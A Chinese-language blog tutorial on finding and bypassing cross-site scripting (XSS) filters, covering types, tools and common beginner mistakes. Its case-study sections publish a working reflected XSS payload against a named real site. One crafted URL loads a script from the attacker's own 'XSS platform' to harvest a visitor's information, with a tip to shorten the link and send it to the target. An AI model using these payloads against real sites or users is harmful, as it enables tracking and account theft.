XSS从入门到放弃

前言

最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。


00×1    什么是XSS漏洞:

     XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。

00×2    XSS漏洞有什么危害:

     1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号

     2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
     3、盗窃企业重要的具有商业价值的资料
     4、非法转账
     5、强制发送电子邮件
     6、网站挂马
     7、控制受害者机器向其它网站发起攻击

00×3    XSS的分类:

     1,反射型:

     定义:非持久型、参数型

     出现位置:网站搜索栏、用户登入口位置

     2,存储型

     定义:持久型

     出现位置:网站留言、评论、博客日志等交互处

     3,DOM型


00×4    XSS漏洞的挖掘:

     如何去挖掘XSS呢?手工+工具+思路+勤奋的双手=漏洞

     手工:自己构造payload,见框就插

     工具:safe3,AWVS,Burpsuite丶Appscan丶XssSniper浏览器插件丶cookie修改工具

     思路:个人信息,留言板,评论等,注意观察url变化,也可能会出现其他漏洞,如:逻辑漏洞

     勤奋:不要总以为自己看一遍就会了,多去实战才能积累经验

     漏洞:当你看到别人挖到了这个网站的漏洞,你就不挖了,他可能只是过滤了一个字符呢?漏洞无处不在,思路很重要

00×5    XSS绕过方法总结:

     1绕过单引号
     2绕过 SCRIPT 过滤
     3使用 IMG 源
     4使用制表符 换行符和回车符
     5使用空白符
     6双引号配对的 bug
     7绕过css过滤器
     8不全面的过滤器
     9转义字符
     10,编码


00×5    XSS的简单闭合案例:

     我已经找到了一个反射型的XSS,我就不打码了

      域名:http://so.kuge.cc/

     是酷鸽网的一个分站,首先我们插入正常的XSS代码    <script>alert('XSS')</script> 

     查看源代码,我们发现他已经插入到html代码中,但是没弹框,不要放弃,我们接着看

     

     我们发现<a href="?op=news&k=<script>alert('XSS')</script> " class="a">新闻</a>

  重点在<a标签,我们发现前面一个<a到后面">结束这一小部分

  我们开始构造payload,闭合<a>标签 payload:"><script>alert('XSS')</script><a

成功弹窗


00×6    利用XSS获取目标IP:

     首先你要找到一个存在XSS漏洞的站,反射型XSS也好,储存型XSS也好,DOM型的也一样

     还是刚才那个,域名:http://so.kuge.cc/

     构造payload:

     http://so.kuge.cc/search.phpk="><script src=你的XSS平台></script><a

  可以缩短发给目标,目标打开后,接收目标信息




00×7  新手在寻找XSS时所存在的一些误区

     1,误区1:XSS,不是专门去“绕过”限制。

     打个简单的比方,一个已经被层层把守的大门,面前荆棘无数,而你又单枪匹马的,怎么闯的进去? 这个时候你要意识到,走大门是不可能的。其实我们要突破的城防,有很多小门可以进去的,甚至不需要任何手段就可以直接走进去。我们为什么不走呢?
     XSS是很好防御的,不就是过滤一下么,所以我们不要太多寄希望与程序员错误的过滤逻辑,而应该把希望寄托于程序员的“忘记过滤”上。


     2,误区2: XSS,不仅仅存在于你所看得见的位置。

大部分新手,在寻找XSS时,都会在一些评论框去输入XSS代码,然后看页面有没有弹窗。当然不是说这个方法没有用,而是这种方法,几乎很难“碰”到一个XSS。所以很多新手会觉得XSS怎么这么难找到。原因有几点:A):像评论框,个人资料这种,你所能想到的位置。稍微有一点安全意识的程序员也能想到,所以经常是被过滤掉的。 B):你所填入的资料,并不总是以HTML标签的形式,输出到页面上。所以有时候并不是不能X,只是因为你填入的东西不对。

看不见有两个层面:


A) 输入看不见。
建议大家在提交请求的时候,使用抓包软件,然后对请求的参数逐个测试。

B)  输出看不见。
建议大家对返回的数据,也可以使用抓包软件抓取数据,然后对抓回的数据进行搜索,搜索你输入的数据,来定位看不见的输出。


3,误区3: XSS,绕过限制不是让你乱用字符去绕过,切忌盲目。
     某人在看到代码是 <a href="xxxx\u0022"> 的时候,问大家:“为什么\u0022”不行啊? 这种绕过是盲目的。

     测试初期,我们如果不愿意去看对方的代码逻辑,可以采用“盲目”的方式去测试(用各种特殊字符去试探),这样可以节省很多时间。但是,当我们已经能够确定,数据输出位于哪个点时,比如上面这个 xxxx ,我们已经知道是输出到了 href="之间"  的时候。我们就不能盲目的去"绕过”,一定要有针对性。这个针对性主要是以下几点。

A) 输出点,是直接输出,还是经过了DOM。

  简单通俗点的说法是:
  前者可以通过右键查看源代码,搜索到。
  后者通过右键查看源代码是搜索不到的。

B) 直接输出点,是位于HTML标签里,还是位于Script脚本里,或者是Style里

  HTML标签又分为:
    是在HTML标签之间: <div> 内容在这里 </div>
    还是在HTML属性之间: <img alt="内容在这里">
    还是在HTML事件之间:  <img>
  Script/style标签:
    根据输出自己去构造闭合,保证语法正确即可。

C)  DOM输出点,这个需要一定的JS基础。
  C.1) 定位输出内容的JS代码段。
  C.2) 查看此代码段,是否存在过滤问题。
  C.3) 如果存在,制定绕过规则。

D) 输出点,采用的什么过滤规则
  D.1)了解以上B)中,
    每个点该过滤什么字符,
    如果没过滤什么字符,该怎么去利用。
  D.2)逐个测试法,看看目标输出点,到底过滤了哪些字符
  D.3)测试服务器端的一些转换逻辑,比如有些服务器会先将&quot;转换为"
  D.4)确定是否可绕过,不能绕过的尽早放弃

     总之,首先要了解如何防御,你才能了解,如何绕过,不能盲目。其中,B+D的规则基本是死的,偶尔碰上些服务器端过滤逻辑有问题的,是可以绕过的,尤其是服务器端采用黑名单的方式时。C则较为灵活,所谓的“绕过”往往是针对这种。


4,其它:

A) 代码里明明看到插入了 <script>,怎么不执行啊?

这种问题,zone里貌似有几个帖子了,这里强调下,打开调试工具看代码的时候,请注意颜色。 以chrome为例,只有<script>..</script>标记以彩色显示时,才说明是插入了,而以黑色显示时,实际上的代码是:&lt;script&gt;.... &lt;/script&gt; ,其它标签同理。

B) <xxx xxxx="xxx"> 这个放进去怎么不行啊?

首先确定你这个是XSS代码,此外,一些新手会在网上找到一些旧的资料,而有些XSS代码是IE6时代的产物,或者是浏览器特异的代码,所以一定要注意代码来源,适用于什么浏览器。

推荐书籍:

XSS跨站脚本攻击剖析与防御


相关文章:

【科普】77种Xss跨站姿势

PHP防御XSS攻击的终极解决方案

77种网站XSS跨站攻击脚本语法

HTML5下的XSS测试代码

xss盗取管理员的cookie

本博客所有文章如无特别注明均为原创。作者:小陈复制或转载请以超链接形式注明转自 小陈's Blog - 致力关注于黑客技术、渗透测试、网络信息安全
原文地址《XSS从入门到放弃
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)